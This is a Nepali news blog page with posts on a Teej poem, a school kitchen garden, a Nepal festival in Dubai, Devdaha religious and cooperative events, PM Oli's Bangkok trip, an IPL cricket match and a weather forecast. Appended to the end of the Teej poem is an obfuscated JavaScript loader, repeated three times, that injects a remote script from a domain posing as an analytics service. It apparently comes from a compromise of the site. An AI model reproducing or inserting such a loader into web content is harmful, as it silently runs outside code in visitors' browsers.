Blog

  • आयो तीज

    आयो तीज

    जागिर छैन, पैसा छैन, छैन चाडको रङ्ग छैन।

    आउन त आयो नि तीज, छिमेकीको आँगनसम्म, हाम्रो घरमा आउँदा त चाडलाई पनि उमङ्ग छैन।

    रित्तो छ आमा गोजी अनि रित्तै छ भान्सा पनि।

    आउदिन्न दिदी, आउँदिने बहिनी।

    उतै रमाउँछिन् भान्जी, आउँदैन भान्जा पनि।

     

    फाटेकै त हो आमा भाग्य, खुसी गरिबीले छोएपछि रुन नगर, हतार।

    चाड त हुनेखानेलाई हो, हामी हुँदा खानेलाई जहिले हुन्छ तब चाड।

    हुन त आमाको मन मानेन होला, मनाउ आमा।

    हिजो आज त पैसाले किन्छ सम्बन्ध।

    नौ गेडी र तिलहरी लर्काउँदै नाच्छिन् दिदी।

    तिम्रो बुच्चो गला हेर्दिनन्।

    सुन र सुनको भाउ दाज्छे बैनी।

    तिम्रो माया र त्याग दाज्दिनन्।

    जसो तसो मनलाई बुझाउला नि है,

    आमा मै छोरी बनेर तीज मनाउला नि है।

    तिमी भन्छौ माइत भनेपछि त हामी सातै खोली तरेर पुग्थ्यौ गाभरी आँसु बनाएर।

    कसरी सकेको होला बस्न मेरो आँशुलाई सस्तो गराएर।

    तिमीले नै भनेकी हौ समयसँगै चल्नु पर्छ।

    पुछ आमा आँसु।

    जसोतसो मनलाई बुझाउला नि है,

    मै छोरी बनेर तीज मनाउला नि है।

    आए त हुने नि, एकै छाक ऋण काढेरै पनि खुवाउथे भन्छिन् आमा।

    यही आँगनबाटै दिएको हो तर पुगे उनी चन्द्रमामा।

    के गर्छ्यौ आमा समय उस्तो कि,

    दिदी बहिनी, एकदिन छिनोफानो गरौला नि है।

    मै छोरी बनेर तीज मनाउला नि है।;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

  • विद्यालयको करेसाबारी: दिवा खाजामा ताजा तरकारी

    विद्यालयको करेसाबारी: दिवा खाजामा ताजा तरकारी

    सुनवल । “विद्यालय पढ्ने ठाउँ मात्र होइन, काम गरेर सिक्ने प्रयोगशाला पनि हो,” यो भनाइलाई व्यवहारमा उतारेको छ सुनवल नगरपालिका–७ स्थित जनज्योति आधारभूत विद्यालयले। विद्यालयको परिसरमा विद्यार्थीहरूले उत्पादन गरेका घिरौंला, बोडी, करेला, फर्सी, टमाटर र मकै अहिले दिवा खाजाको परिकार बन्दै आएका छन्।
    किताबी ज्ञान मात्र हैन व्यहारिक शिक्षालाइ जोड दिने विद्ध्यालाको नीति अहिले नियमित अभ्यास बनेको छ। विद्यार्थीहरू पाठ्यपुस्तकको पढाइसँगै खेतबारीको व्यवहारिक ज्ञानमा पनि रमाइरहेका छन्।
    “विद्यार्थीले आज मात्रै दोस्रो छाकमा घिरौंला खाए। पहिले टमाटर फल्यो, तर अहिले सकिएको छ। अहिले चाहिँ बोडी मात्र बाँकी छ,” विद्यालयका शिक्षक राजेश तिवारीले जानकारी दिए। “फर्सीका मुन्टाहरू चाहिँ जाउलोमा हालेर खुवाउने गरेका छौं,” उनले थपे। उनका अनुसार मकैको पहिलो लट भाँचिसकिएको छ भने दोस्रो लटको तयारी भइरहेको छ। पहिले गोभी र बन्दा पनि फलाएर विद्यार्थीले दिवा खाजा खाएको उनले बताए।
    विद्ध्यालयमा करेसा बारी सुनवल नगरपालिले स्थानीय पाठेक्रममा समावेस गर्नुको साथै विद्यालयमा बजेट पनि बिनियोजन गरेको छ यसले पनि बिउ बिजन र मल खरिद लाइ सहज भएको विद्यालयकि प्रधानाध्यापक सावित्री कुमारी राना बताउँछिन् । विद्यालयमा व्यवहारिक शिक्षाको अभ्यासका रूपमा सुरु गरिएको करेसाबारी अभियानले विद्यार्थीलाई उत्पादनमा समेत अभ्यस्त बनाएको छ। केही पिरियडमा पढाइ सकेपछि विद्यार्थीहरू खुसी हुँदै करेसाबारीतिर लाग्छन्। “विद्यार्थीहरू करेसाबारीतिर जान पाउँदा रमाउँछन्।
    कक्षा शिक्षक बिदामा बसेको समय, दिउँसो खाजा खाने समय र आवश्यकता परेको बेला छुट्टीको दिन विद्यार्थीहरू उत्साहित भएर विद्यालय आउँछन् । उनी दिनभरि नर्सरी र तरकारी खेतीमा रमाउँछन् ।
    जनज्योति आधारभूत विद्यालयमा सञ्चालन गरिएको करेसाबारीले केवल तरकारी मात्रै फलाएको छैन, विद्यार्थीको सोच, दृष्टिकोण र सीप पनि हुर्काइदिएको छ। यस्तो व्यवहारिक अभ्यासले ग्रामीण विद्यालयमा शिक्षालाई जीवनोपयोगी बनाउन मद्दत गरेको छ ।

  • नेपाल फेस्टिवलभित्र लुकेको देशको माया

    नेपाल फेस्टिवलभित्र लुकेको देशको माया

    युएई – दुबईको क्रिक पार्क आइतबार बिहानैदेखि रंगीन थियो। विदेशी भूमिमा एकछिनका लागि भए पनि नेपालको माटोको स्पर्श महसुस गर्ने मौका सायद नेपालीले नेपाल फेस्टिवलमा पाए।

    रातो सारीमा सजिएकी कमला पौडेल मेट्रोबाट हतारिँदै उड्मेहेता भन्ने ठाउँमा झरिन्। दुबईको चिल्ला रेल लाइनमा हस्यान गर्दै दौडिँदा उनको सारीको फेर हावासँग लहराउँदै थियो। हातमा सानो झोला, अनुहारमा हतार, तर मुटुमा एउटा अचम्मको शान्ति। “अब त ढिला भए जस्तो लाग्दैछ,” उनले पार्कको गेटमा अलिक सहज हुँदै भनिन्।

    कार्यक्रम स्थल जाने पूरा गेट भरी भराउ थीए । मान्छे लाइनमा पाच दिरामको टिकट काटेर भित्र छिर्ने पालो प्रतीक्षामा थीए।

    उता स्याङ्जा घर भइ देरा बस्ने  – कृष्ण गुरुङ  बिहानै सिफ्ट सकेर कामको ड्रेसमै कार्यक्रमतिर दौडिए। “आज बिदा छैन, तर त्यो मादलको तालले मलाई रोकेन,” उनले भने,

    एलिना चौहानको गीतमा लय मिलाउँदै थिइन बिराटनगर घर भएकी सुसिला पासी, जो देश बाहिर यस्तो कार्यक्रममा पहिलो पटक सहभागी भएकी थिइन्। “हाम्रो, गाउँको महोत्सव जस्तै हुँदो रैछ,” उनले भनिन्।

    “नेपाली कला, संस्कृति, खेलकुद, व्यापार, पर्यटन तथा नेपाली पहिचानको उत्सव” भन्ने मूल नाराका साथ आइतबार युएईको दुबईस्थित क्रिक पार्कमा नेपाल फेस्टिवलमा भव्य रूपमा सम्पन्न भएको छ। कार्यक्रममा ५० हजारभन्दा बढी दर्शकहरूको सहभागिता रहेको आयोजकहरूले जनाएका छन्।

    नेपाली राजदूतावास, आबुधावीको संरक्षकत्वमा नेपाल एसोसिएसन–एनआरएनए एनसीसी यूएई, नेपाली समाज युएई तथा युएईमा सक्रिय विभिन्न संघसंस्थाको सहकार्यमा आयोजना गरिएको फेस्टिवलमा प्रवासमा रहेका नेपालीहरू मात्र नभई अन्य मुलुकका दर्शकहरूको पनि उल्लेख्य उपस्थिति रहेको थियो।

    फेस्टिवलमा नेपाली मौलिक कला, संस्कृति, भेषभूषा, खानपान र हस्तकलाका विविध पक्षहरूको प्रस्तुति दिइएको थियो। नेपालका प्रमुख पर्यटकीय गन्तव्यहरूको प्रवर्द्धन गर्ने उद्देश्यले एक दर्जनभन्दा बढी स्टलहरू सञ्चालन गरिएको थियो। ती स्टलहरूमा परम्परागत परिकार, हस्तकला सामग्री, संस्कृति झल्काउने वस्त्र तथा सूचना सामग्रीहरूको प्रदर्शन गरिएको थियो।

    कार्यक्रमको उद्घोषण चर्चित कमेडियन तथा सञ्चारकर्मी सन्दीप क्षेत्री र पूर्व मिस नेपाल, नायिका तथा मोडल नर्मता श्रेष्ठले गरेका थिए। सांगीतिक कार्यक्रमको आकर्षणको रूपमा गायिका शान्ति श्री परियार, गायक अर्जुन सापकोटा, चक्र बम, एलिना चौहान र बमबहादुर कार्कीले आफ्ना लोकप्रिय गीतहरू प्रस्तुत गर्दा दर्शकहरू झुमेका थिए।

    साथै, विभिन्न जातजाति र समुदायका सांस्कृतिक झाँकीहरूले नेपालको सांस्कृतिक विविधता झल्काएका थिए। लोकनृत्य, मौलिक पहिरन, र परम्परागत बाजागाजासहितको झाँकीहरूले दर्शकको ध्यान तानेको थियो।

    कार्यक्रमको समापनतिर दर्शकहरूको भीड अझै बाक्लिँदै गयो। कतिपय दर्शकहरू नेपालकै स्वाद र संगीतले भावुक बनेका देखिन्थे। दुबईमा त्यो दिन नेपाल मात्र देखिएको थिएन, नेपाल जिउँदै बाँचिरहेको थियो।

     

  • देवदहमा मंगल पुष्करिणी दह धार्मिक महोत्सव सुरु

    देवदहमा मंगल पुष्करिणी दह धार्मिक महोत्सव सुरु

    रुपन्देही – देवदहमा मंगल पुष्करिणी दह धार्मिक महोत्सव सुरु भएको छ। बिहीबार एक समारोहबीच दहमा महापरित्राण पाठ गर्दै महोत्सवको औपचारिक उद्घाटन गरिएको हो। देवदह–९ का वडा अध्यक्ष तथा महोत्सव मूल आयोजक समिति संयोजक मोहन जिसीका अनुसार अन्तर्राष्ट्रिय भिक्षुणी विहारबाट मंगल पुष्करिणी दहसम्म कलश यात्रा निकालिएको थियो।

    महोत्सवको पहिलो दिन अखिल नेपाल भिक्षु महासंघका पूर्व केन्द्रीय अध्यक्ष तथा अन्तर्राष्ट्रिय बौद्ध समाजका अध्यक्ष भिक्षु मैत्री महास्थवीरको नेतृत्वमा महापरित्राण पाठ सम्पन्न भयो। कार्यक्रममा लुम्बिनी विकास कोषका कोषाध्यक्ष सिद्धिचरण भट्टराई, देवदह नगरपालिकाका प्रमुख ध्रुवप्रसाद खरेल, उपप्रमुख विद्यालक्ष्मी गुरुङ, पूर्व नगर प्रमुख हिरा बहादुर खत्री, अन्तर्राष्ट्रिय भिक्षुणी महासंघकी अध्यक्ष न्यानवती गुरुमा लगायतको उपस्थिति थियो।

    भिक्षु मैत्री महास्थवीरले देवदह क्षेत्रको समग्र विकास आवश्यक रहेको बताउँदै, बौद्धकालीन ऐतिहासिक स्थलहरूको संरक्षण र प्रवर्द्धनले क्षेत्रको समृद्धि ल्याउने उल्लेख गरे। उनले देवदह, बैरिमाई, कन्यामाई, पाकरी, पण्डितपुर र रामग्रामलाई समेटेर योजनाबद्ध विकास गर्नुपर्ने धारणा राखे।

    महोत्सवको कलश यात्रामा विभिन्न संघ–संस्था, आमा समूह र भूपू सैनिक कल्याणकारी समाज, मगर संघ, उज्यालो लालटिन प्रतिष्ठान लगायतले सहभागिता जनाएका थिए। उनीहरूले पानी, चिया लगायत सामग्री निःशुल्क वितरण गरेका थिए। बौद्ध परम्परा अनुसार बिहीबार महापरित्राण पाठसँगै सुरु भएको महोत्सवमा शुक्रबारदेखि श्रीमद्भागवत महापुराण सुरु हुनेछ। हिन्दू परम्पराअनुसार कलश यात्रा गरी श्रीमद्भागवत महायज्ञ प्रारम्भ गरिनेछ।

    ऐतिहासिक मंगल पुष्करिणी (देवदह) को प्रचारप्रसारसहित देवदह–९ स्थित सन्दीप आधारभूत विद्यालय र छाडा चौपाया व्यवस्थापनका लागि निर्माण गरिएको गौशालालाई सहयोग जुटाउन महोत्सव आयोजना गरिएको वडा सदस्य कृष्णमाया रानाले जानकारी दिइन्।

  • प्रधानमन्त्री ओली बैंककमा, आज उच्चस्तरीय वार्ता

    प्रधानमन्त्री ओली बैंककमा, आज उच्चस्तरीय वार्ता

    काठमाडौ । थाइल्यान्डको औपचारिक भ्रमण र बहुपक्षीय प्राविधिक तथा आर्थिक सहयोगका लागि बंगालको खाडी प्रयास (बिमस्टेक)को छैटौँ शिखर सम्मेलनमा सहभागी हुन प्रधानमन्त्री केपी ओली मंगलबार बैंकक पुगेका छन् ।

    थाई समकक्षीको निमन्त्रणामा नेपालका प्रधानमन्त्रीबाट पहिलोपटक थाइल्यान्डको औपचारिक भ्रमण भएको हो ।

    प्रधानमन्त्री ओलीलाई सुवर्णभूमि अन्तर्राष्ट्रिय विमानस्थलको विशिष्ट कक्षमा थाइल्यान्डका उपप्रधानमन्त्री एवं यातायातमन्त्री सुरिया जंग्राउन ग्रेङकिटदम्पती, संस्कृति तथा खेलकुदमन्त्री सोरावोङ थेनबोङदम्पती र थाइल्यान्डका लागि नेपाली राजदूत धनबहादुर वली, नेपालका लागि थाइल्यान्डका राजदूत सावापोङ सिरिसोर्नसहितले स्वागत गरेका थिए । थाई प्रधानमन्त्री पे थोङथान शिनावात्राले प्रधानमन्त्री ओलीलाई निमन्त्रणा गरेकी थिइन् ।

    प्रधानमन्त्रीको भ्रमण दलमा प्रधानमन्त्रीपत्नी राधिका शाक्य, परराष्ट्रमन्त्री डा. आरजु राणा देउवा, प्रधानमन्त्रीका मुख्य सल्लाहकार विष्णुुप्रसाद रिमाल, आर्थिक विकास सल्लाहकार डा. युवराज खतिवडा, नेपाल सरकारका मुख्यसचिव एकनारायण अर्याल, परराष्ट्र मन्त्रालयका सचिव अमृतबहादुर राईलगायत सहभागी छन् ।

    बुधबार नेपाल र थाइल्यान्डका प्रधानमन्त्रीबिच औपचारिक वार्ता हुनेछ । त्यसक्रममा दुई सरकारी र ६ निजी क्षेत्रबिच सहकार्यसम्बन्धी सम्झौतापत्रमा हस्ताक्षर हुनेछ । प्रधानमन्त्रीको सचिवालयका अनुसार द्विपक्षीय वार्तापछि नेपाल र थाइल्यान्डका प्रधानमन्त्रीले बुधबार संयुक्त पत्रकार सम्मेलन गर्ने कार्यक्रम छ । उनले थाइल्यान्डका नरेश महा बजिरालोङकोर्नसँग शिष्टाचारर भेट गर्नेछन् ।

    प्रधानमन्त्री ओलीले बिहीबार थाइल्यान्डका प्रतिष्ठित व्यवासायीहरूसँग अन्तक्र्रिया गर्ने कार्यक्रम छ । एसियन इन्स्टिच्युट अफ टेक्नोलोजीमा आयोजित कार्यक्रमलाई उनले सम्बोधन गर्ने तथा नेपालका तर्फबाट एक लाख डलर सहयोग गर्ने कार्यक्रम पनि तय भएको छ ।

    औपचारिक भ्रमण सकिएलगत्तै प्रधानमन्त्री ओलीले बिमस्टेक शिखर सम्मेलनमा सहभागिता जनाउनेछन् । प्रधानमन्त्री ओली बिहीबार साँझ बिमस्टेक शिखर सम्मेलनका नेताहरूलाई थाई प्रधानमन्त्रीद्धारा आयोजित औपचारिक रात्रिभोजमा सहभागी हुनेछन् । उनी शुक्रबार बिमेस्टक शिखर सम्मेलनमा सहभागी हुनेछन् । त्यही दिन प्रधानमन्त्री ओलीसहित शीर्ष नेताहरूले सम्बोधन गर्ने कार्यक्रम छ ।

    बिमस्टेक नेताहरूबिच मेरिटाइम ट्रान्सपोर्ट कोअपरेसन अग्रिमेन्टमा हस्ताक्षर हुने कार्यक्रम रहेको ओलीले संसद्लाई जानकारी दिएका छन् । शुक्रबार साँझ बैंककस्थित नेपाली राजदूतावासमा आयोजित रात्रिभोजमा सहभागी भएर प्रधानमन्त्री ओली शनिबार स्वदेश फर्किनेछन् ।

  • पञ्जाबको लगातार दोस्रो जित

    पञ्जाबको लगातार दोस्रो जित

    एजेन्सी । पञ्जाब किंग्सले इण्डियन प्रिमियर लिग (आइपिएल) २०२५ मा लगातार दोस्रो जित हासिल गरेको छ ।

    मंगलवार भएको खेलमा लगातार दोस्रो जित हात पार्ने क्रममा पञ्जाबले लखनउ सुपर जायन्ट्सलाई ८ विकेटले पराजित गर्यो । लखनउले दिएको १ सय ७२ रनको लक्ष्य पञ्जाबले १६.२ ओभरमा २ विकेट गुमाएर पूरा गर्यो ।

    पञ्जाबको जितमा ओपनर ओपनर प्रभसिमरन सिंहले ३४ बलमा ९ चौका र ३ छक्काको सहयोगमा सर्वाधिक ६९ रन जोडे । प्रभसिमरनले दोस्रो विकेटका लागि कप्तान श्रेयस ऐरसँग मिलेर ८४ रनको साझेदारी गरे । कप्तान ऐर ३० बलमा ३ चौका र ४ छक्काको सहयोगमा ५२ रनमा नट आउट रहे ।

    तेस्रो विकेटका लागि कप्तान ऐर र नेहाल बढेराले ६७ रनको विजयी साझेदारी गरे । नेहालले २५ बलमा ३ चौका र ४ छक्काको सहयोगमा ४३ रनमा नट आउट रहे । ओपनर प्रियासं आर्य ८ रनमा आउट भए । लखनउका लागि दुवै सफलता दिग्वेश राठीले दिलाए ।

    त्यसअघि लखनउस्थित एकाना अन्तर्राष्ट्रिय क्रिकेट स्टेडियममा टस हारेर ब्याटिङको निम्तो पाएको लखनउले निर्धारित २० ओभरमा ७ विकेट गुमाएर १ सय ७१ रनको योगफल तयार गरेको थियो ।

    लखनउका लागि निकोलस पुरनले ३० बलमा ५ चौका र २ छक्काको सहयोगमा सर्वाधिक ४४ रन जोडेका थिए । आयुष बदोनीले ३३ बलमा १ चौका र ३ छक्काको सहयोगमा ४१ रन बनाएका थिए ।

    अब्दुल समाद १२ बलमा २ चौका र २ छक्काको सहयोगमा २७ रनमा आउट भएका थिए । ओपनर एडेन मारक्रम १८ बलमा २८, डेबिड मिलर १८ बलमा १९ तथा कप्तान ऋषभ पन्त २ रनमा आउट भएका थिए ।

    पञ्जाबका लागि अर्शदिप सिंहले ३ तथा लकि फर्गुसन, ग्लेन म्याक्सवेल, मार्को यानसन र युजभेन्द्र चहलले समान १ विकेट लिएका थिए ।

    लगातार दोस्रो जितका साथ पञ्जाब ४ अंकका साथ तालिकाको दोस्रो स्थानमा उक्लिएको छ । पञ्जाबले पहिलो खेलमा गुजरात टाइटन्सलाई उसकै मैदान अहमदाबादमा पराजित गरेको थियो ।

    यस्तै, पराजित लखनउले तेस्रो खेलमा दोस्रो हार बेहोरेको छ । लखनउ ३ खेलमा २ अंकका साथ तालिकाको छैठौं स्थानमा छ । दिल्ली क्यापिटल्ससँगको पहिलो खेल गुमाएको लखनउले दोस्रोमा सनराइजर्स हैदराबादलाई पराजित गरेको थियो ।

  • पश्चिमी र स्थानीय वायुको आंशिक प्रभाव रहने

    पश्चिमी र स्थानीय वायुको आंशिक प्रभाव रहने

    काठमाडौं । जल तथा मौसम विज्ञान विभाग मौसम पूर्वानुमान महाशाखाले हाल देशमा पश्चिमी तथा स्थानीय वायुको आंशिक प्रभाव रहेको जनाएको छ ।

    महाशाखाका अनुसार अहिले कोशी, गण्डकी र कर्णाली प्रदेशको पहाडी भूभागमा आंशिक बदली रही बाँकी भूभागमा मौसम मुख्यतया सफा रहेको छ ।

    आज दिउँसो कोशी, मधेश, बागमती, गण्डकी र लुम्बिनी प्रदेशमा आंशिक बदली रही बाँकी भूभागमा आंशिक बदलीदेखि मौसम मुख्यतया सफा रहने छ ।

    कोशी र गण्डकी प्रदेशका उच्च पहाडी तथा हिमाली भूभागका एकदुई स्थानमा हल्का हिमपातको सम्भावना रहेको छ ।

    आज राति कोशी, मधेश, बागमती, गण्डकी र लुम्बिनी प्रदेशमा आंशिक बदली रही बाँकी भूभागमा आंशिक बदलीदेखि मौसम मुख्यतया सफा रहने छ ।

    आज सूर्योदय बिहान ५ बजेर ५३ मिनेटमा भयो भने सूर्यास्त साँझ ६ बजेर २२ मिनेटमा हुनेछ ।

  • देवदहमा सहकारीको वर्तमान अवस्था र आगामी रणनीतिहरु विषयक कार्यशाला गोष्ठी

    देवदहमा सहकारीको वर्तमान अवस्था र आगामी रणनीतिहरु विषयक कार्यशाला गोष्ठी

    देवदह । रुपन्देहीको देवदहमा सहकारीहरुको वर्तमान अवस्था र आगामी रणनीतिहरु विषयक कार्यशाला गोष्ठी सम्पन्न भएको छ। देवदह नगरपालिका सहकारी सञ्जालको आयोजना र देवदह नगरपालिकाको आर्थिक सहयोगमा  ६८ औं राष्ट्रिय सहकारी दिवस २०८१ को अवसरमा मंगलबार उक्त कार्यक्रम भएको हो ।

    कार्यक्रममा मन्तव्य व्यक्त गर्दै देवदह नगरपालिकाका कार्यवाहक नगर प्रमुख विद्या लक्ष्मी  गुरुङले गोष्ठीबाट उठेका कुराहरुलाई कार्यपालिकाको बैठकमा लैजाने र त्यसको समाधान गर्ने कुरामा आफू सकारात्मक रहेको बताइन । कार्यक्रममा प्रमुख अतिथि समेत रहनु भएकी गुरूङले  एकै प्रकृतिका सहकारीहरु समायाेजन गर्न जरुरी रहेकोले  एकीकरण भएर जान आग्रह गरे । सहकारीले आफ्ना शेयर सदस्यहरुलाई सहकारी शिक्षाको आवश्यकता रहेको हुँदा समय समयमा सहकारीको काम कर्तब्यका बारेमा प्रशिक्षण दिनु पर्ने बताए । उनले सहकारीहरूले आर्थिक समृद्धि र सामाजिक एकतामा महत्त्वपूर्ण भुमिका खेल्ने हुदा सोही अनुसार लाग्न आग्रह गरिन ।

    सहकारीले शेयर सदस्यलाई ब्यावसायी र उद्धमी बनाउन आग्रह गर्दै नगरपालिकाले समेत सहयोग गर्न तयार रहेकाे बताइन । उनले यस किसिमका कार्यक्रमले सहकारी क्षेत्रलाई थप सशक्त र प्रभावकारी बन्नेमा आफू आसावादी रहेको बताइन ।

    कार्यशाला गोष्ठीमा  देवदह नगरपालिकाका सहकारी शाखाका तिर्थ खनाल, जिल्ला सहकारी संघ रुपन्देहीका अध्यक्ष भिम तुलाचन लगाएतले आ-आफ्नो भनाई राखेकी थिइन ।

    कार्यक्रममा कृषि सहकारीको विषयमा राष्ट्रिय सहकारी संघका सञ्चालक टीका न्यौपाने, बचत तथा ऋण सहकारी संस्थाको विषयमा जिल्ला सहकारी संघ रुपन्देहीको कोषाध्यक्ष सुभाकान्त न्यौपाने, बहुउद्देश्यीय सहकारी संस्थाको विषयमा जिल्ला सदस्य मोतिलाल ढकाल र दूध उत्पादक सहकारीका विषयमा सुर्यकान्त रेग्मीले प्रस्तुती दिएका थिए ।

    कार्यक्रम सहकारी संञ्जाल देवदहका अध्यक्ष जागेश्वर पंगेनीको अध्यक्षता र सञ्जालका सचिव गोबिन्द ठडराईको सञ्चालनमा सम्पन्न भएको थियो ।

  • देवदहमा श्रीमद्भागवत महापुराण तथा मङ्गलपुष्करिणी दह धार्मिक महोत्सव–२०८१ आयोजना हुने

    देवदहमा श्रीमद्भागवत महापुराण तथा मङ्गलपुष्करिणी दह धार्मिक महोत्सव–२०८१ आयोजना हुने

    देवदह । रुपन्देहीको देवदहमा श्रीमद्भागवत महापुराण तथा मङ्गलपुष्करिणी दह धार्मिक महोत्सव–२०८१ आयोजना हुने भएको छ । ऐतिहासिक, धार्मिक र पर्यटकीय महत्व बोकेको देवदह–९, को मङ्गलपुष्करिणी दहमा श्रीमद्भागवत महापुराण तथा मङ्गलपुष्करिणी दह धार्मिक महोत्सव हुने पत्रकार सम्मेलन गरी जानकारी गराएको हो ।

    देवदह नगरपालिका–९, वडा कार्यालयको आयोजनामा चैत्र २१ देखि २८ गतेसम्म श्रीमद्भागवत महापुराण तथा मङ्गलपुष्करिणी दह धार्मिक महोत्सव हुने वडाअध्यक्ष मोहनबहादुर जिसीले जानकारी दिए। मूल आयोजक समिति संयोजक जिसीले देवदह दहको संरक्षण, छाडा चौपाया व्यवस्थापन तथा सन्दिप आधारभूत विद्यालय व्यवस्थापनको लागि महोत्सव आयोजना गरिएको बताए ।

    प्राचीन समयमा राजा तथा ऋषि–तपस्वीहरूले स्नान गर्ने पवित्र स्थल देवदह दह भएकाले यसको संरक्षण र प्रचारप्रसार आवश्यक रहेको जिसीले जानकारी दिए । उनले महोत्सव एब लाखले भक्तजनले अवलोकन गर्ने र करिव १ करोडको कारोवार हुने वडाअध्यक्ष जिसीले जानकारी दिए । उनले महोत्सवबाट संकलन गरिएको रकमबाट देवदह दहको संरक्षण, देवदह–९, मा रहेको गौशालालाई व्यवस्थित गर्ने र सन्दिप आधारभूत विद्यालयको स्तरउन्नती गर्ने जानकारी दिए।

    महोत्सव अन्र्तगत चैत्र २१ गते पत्रकार सम्मेलनमा बोल्दै वडाअध्यक्ष जिसीले शान्तिले मात्र समृद्ध नगर बनाउन सकिने भएकोले देवदह दह लाई ध्यानकेन्द्रको रुपमा विकास गर्दै जाने बताए । पत्रकार सम्मेलनमा देवदह नगरपालिकाका पुर्व नगर प्रमुख हिराबहादुर खत्रीले देवदह दह यस क्षेत्रकै महत्वपूर्ण धार्मिक तथा पर्यटकीय गन्तव्य भएको उल्लेख गरे । उनले यस क्षेत्रको विकास र प्रचार प्रसारका लागि स्थानीय तहले निरन्तर योगदान दिँदै आएको बताए  । पुरातत्व विभागले उत्खनन् र प्रमाणीकरण लगायतका कार्यमा ढिलाइ गर्नु हुँदैन । उनले देवदहको धेरै ठाउमा उत्खनन् गरीसकेको भएपनि प्रमाणितकरण हुन नसकेको बताए । उनले उत्खनन्को क्रममा खयरडाडामा प्राचिन कुवा फेला परेको बताए ।

    महोत्सव अवधिभर विभिन्न धार्मिक तथा सांस्कृतिक कार्यक्रमहरू आयोजना गरिनेछ । चैत्र २१ गते बौद्ध गुरुहरूले दह शुद्धीकरण पूजाको आरम्भ गर्नेछन् भने चैत्र २२ गते शोभा कलश यात्रा पछि महोत्सवको औपचारिक उद्घाटन गरिनेछ । महोत्सव अवधिभर प्रत्येक दिन पूजा–अर्चना, पाठ पारायण, कथा प्रवचन, राष्ट्रिय कलाकारहरूको भजन तथा झाँकी प्रदर्शन गरिने आयोजकले जनाएको छ । कार्यक्रममा कथावाचक पं. चन्द्रकान्त काफ्लेले संगीतमय श्रीमद्भागवत कथा वाचन गर्नेछन् ।